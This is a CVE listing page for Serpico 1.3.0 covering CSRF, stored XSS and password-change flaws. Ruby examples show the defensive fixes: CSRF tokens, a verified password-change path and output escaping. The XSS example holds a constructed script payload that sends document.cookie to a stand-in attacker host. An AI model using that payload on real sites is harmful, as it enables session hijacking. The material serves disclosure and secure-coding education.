Serpico Project: Serpico 1.3.0

6 matches found

CVE-2019-19854 (added 2020/01/15)

An issue was discovered in Serpico (aka SimplE RePort wrIting and CollaboratiOn tool) 1.3.0. It does not use CSRF Tokens to mitigate against CSRF; it uses the Origin header (which must match the request origin). This is problematic in conjunction with XSS: one can escalate privileges from User leve...

CVSS 8.8 | AI score 8.8 | EPSS 0.00141
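The difference between the Origin-header check described in this entry and a synchronizer token, as an added Ruby example (not Serpico's own code): the site origin, the request shapes and the token parameter name are assumptions. A request that merely arrives from the right origin, which is exactly what script running in the origin can produce, satisfies the Origin-only check; the token variant additionally demands a per-session secret that a foreign form cannot know. A token is still readable by script already running in the origin, so output encoding of the stored fields is the other half of the fix.

```ruby
require 'securerandom'

# Assumed deployment origin of the Serpico instance (hypothetical).
SITE_ORIGIN = 'https://serpico.example'.freeze

# Scheme described in the entry: the request is trusted when its Origin
# header equals the site's own origin. Anything that makes the browser send
# a request from that origin (for example injected script) passes this.
def origin_only_allows?(headers)
  headers['Origin'] == SITE_ORIGIN
end

# Synchronizer token: a per-session random secret that must be echoed back
# in the request body. A form served by a foreign origin cannot know it.
def issue_csrf_token(session)
  session[:csrf_token] ||= SecureRandom.hex(32)
end

# Constant-time comparison so the token cannot be recovered byte by byte
# from response timing.
def secure_equal?(a, b)
  return false if a.nil? || b.nil? || a.bytesize != b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

def token_and_origin_allows?(headers, params, session)
  origin_only_allows?(headers) &&
    secure_equal?(params['csrf_token'], session[:csrf_token])
end

# Constructed requests standing in for a state-changing POST such as
# admin/add_user; the parameter name csrf_token is an assumption.
def constructed_requests
  session = {}
  token = issue_csrf_token(session)
  {
    cross_site:             [{ 'Origin' => 'https://attacker.example' }, { 'csrf_token' => 'guess' }, session],
    same_origin_no_token:   [{ 'Origin' => SITE_ORIGIN }, {}, session],
    same_origin_with_token: [{ 'Origin' => SITE_ORIGIN }, { 'csrf_token' => token }, session]
  }
end

# Decision of each scheme for each constructed request.
def decisions
  constructed_requests.transform_values do |headers, params, session|
    { origin_only: origin_only_allows?(headers),
      origin_plus_token: token_and_origin_allows?(headers, params, session) }
  end
end

if __FILE__ == $PROGRAM_NAME
  decisions.each { |name, verdict| puts "#{name}: #{verdict}" }
end
```

Running it shows the same-origin request without a token accepted by the Origin-only check and rejected once the token is required; the cross-site request is rejected by both.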
CVE-2019-19858 (added 2020/01/15)

An issue was discovered in Serpico (aka SimplE RePort wrIting and CollaboratiOn tool) 1.3.0. admin/add_user/UID allows stored XSS via the author parameter.

CVSS 4.8 | AI score 4.8 | EPSS 0.00321
CVE-2019-19857 (added 2020/01/15)

An issue was discovered in Serpico (aka SimplE RePort wrIting and CollaboratiOn tool) 1.3.0. An admin can change their password without providing the current password, by using interfaces outside the Change Password screen. Thus, requiring the admin to enter an Old Password value on the Change Pass...

CVSS 6.5 | AI score 6.5 | EPSS 0.00209
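One way to make the current-password requirement hold regardless of which interface is used, as an added Ruby example (not Serpico's own code): the PBKDF2 parameters, the user table layout and the minimum length are assumptions. The point is a single choke point for setting a password on the caller's own account, so the Change Password screen and any other route (profile edit, admin self-update, API) cannot differ in what they verify.

```ruby
require 'openssl'
require 'securerandom'

# Assumed work factor; Serpico's own password hashing is not shown here.
PBKDF2_ITERATIONS = 100_000
MIN_PASSWORD_LENGTH = 12

def hash_password(password, salt = SecureRandom.random_bytes(16))
  digest = OpenSSL::PKCS5.pbkdf2_hmac(password, salt, PBKDF2_ITERATIONS, 32, 'sha256')
  { salt: salt, digest: digest }
end

# Constant-time comparison of two byte strings.
def secure_equal?(a, b)
  return false if a.nil? || b.nil? || a.bytesize != b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

def password_matches?(password, record)
  candidate = OpenSSL::PKCS5.pbkdf2_hmac(password, record[:salt], PBKDF2_ITERATIONS, 32, 'sha256')
  secure_equal?(candidate, record[:digest])
end

# The only function allowed to replace a user's own password hash. Every
# interface that lets a user (admin or not) change their own password must
# call this, so the current-password check cannot be sidestepped by picking
# a different route into the application.
def change_own_password(users, login, current_password, new_password)
  record = users[login]
  return [false, :no_such_user] if record.nil?
  return [false, :current_password_wrong] unless password_matches?(current_password.to_s, record)
  return [false, :new_password_too_short] if new_password.to_s.length < MIN_PASSWORD_LENGTH
  users[login] = hash_password(new_password)
  [true, :changed]
end

# Constructed user table with one admin account.
def demo_users
  { 'admin' => hash_password('correct horse battery staple') }
end

# A request from some other interface that omits the current password.
def demo_bypass_attempt
  users = demo_users
  change_own_password(users, 'admin', nil, 'attacker-chosen-pw-123')
end

# The legitimate flow: current password supplied, new one takes effect.
def demo_legit_change
  users = demo_users
  result = change_own_password(users, 'admin', 'correct horse battery staple', 'new-long-password-456')
  [result, password_matches?('new-long-password-456', users['admin'])]
end

if __FILE__ == $PROGRAM_NAME
  p demo_bypass_attempt
  p demo_legit_change
end
```

An admin resetting another user's password is a different action and should be a different function, one that re-authenticates the admin rather than the target user; the function above deliberately handles only the self-service case.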
CVE-2019-19856 (added 2020/01/15)

An issue was discovered in Serpico (aka SimplE RePort wrIting and CollaboratiOn tool) 1.3.0. The User Type on the admin/list_user page allows stored XSS via the type parameter.

CVSS 4.8 | AI score 4.8 | EPSS 0.00235
CVE-2019-19855 (added 2020/01/15)

An issue was discovered in Serpico (aka SimplE RePort wrIting and CollaboratiOn tool) 1.3.0. admin/list_user allows stored XSS via the auth_type parameter.

CVSS 4.8 | AI score 4.8 | EPSS 0.00235
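The stored XSS entries for admin/list_user (type, auth_type) and admin/add_user (author) share one root cause, so one added Ruby example (not Serpico's own code) covers them: a row rendered by string interpolation beside a row rendered with HTML escaping on output, plus an allowlist check on the enumerated fields at input. The allowed type and auth_type values, the row layout and the payload are assumptions.

```ruby
require 'erb'

# Assumed allowed values; Serpico's own enumerations are not shown here.
USER_TYPES = %w[Administrator User].freeze
AUTH_TYPES = %w[Local AD].freeze

# Vulnerable rendering: stored fields are interpolated straight into HTML,
# so a type of "<script>..." saved via the admin form runs for every admin
# who later opens the user list.
def render_user_row_vulnerable(user)
  "<tr><td>#{user[:username]}</td><td>#{user[:type]}</td><td>#{user[:auth_type]}</td></tr>"
end

# Hardened rendering: escape every stored value on output. This works for
# free-text fields (such as author) as well as enumerated ones.
def render_user_row(user)
  cells = [user[:username], user[:type], user[:auth_type]].map { |v| ERB::Util.html_escape(v.to_s) }
  "<tr>#{cells.map { |c| "<td>#{c}</td>" }.join}</tr>"
end

# Input-side check for fields that have a fixed set of values, so markup
# never reaches the database in the first place.
def validate_user_params(params)
  errors = []
  errors << "type must be one of #{USER_TYPES.join('/')}" unless USER_TYPES.include?(params['type'])
  errors << "auth_type must be one of #{AUTH_TYPES.join('/')}" unless AUTH_TYPES.include?(params['auth_type'])
  errors
end

# Constructed payload of the kind an attacker with access to the admin form
# could store in the type field.
PAYLOAD = '<script>document.location="https://attacker.example/?c="+document.cookie</script>'.freeze

def demo
  stored = { username: 'eve', type: PAYLOAD, auth_type: 'Local' }
  {
    vulnerable_html: render_user_row_vulnerable(stored),
    hardened_html:   render_user_row(stored),
    input_errors:    validate_user_params('type' => PAYLOAD, 'auth_type' => 'Local')
  }
end

if __FILE__ == $PROGRAM_NAME
  demo.each { |k, v| puts "#{k}: #{v}" }
end
```

Escaping on output is the fix that holds for every field; the allowlist is a second layer for the fields that have a known value set, and it also catches the unlimited-data problem on those fields.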
CVE-2019-19859 (added 2020/01/15)

An issue was discovered in Serpico (aka SimplE RePort wrIting and CollaboratiOn tool) 1.3.0. The Add Collaborator allows unlimited data via the author parameter, even if the data does not match anything in the database.

CVSS 5.3 | AI score 5.2 | EPSS 0.00237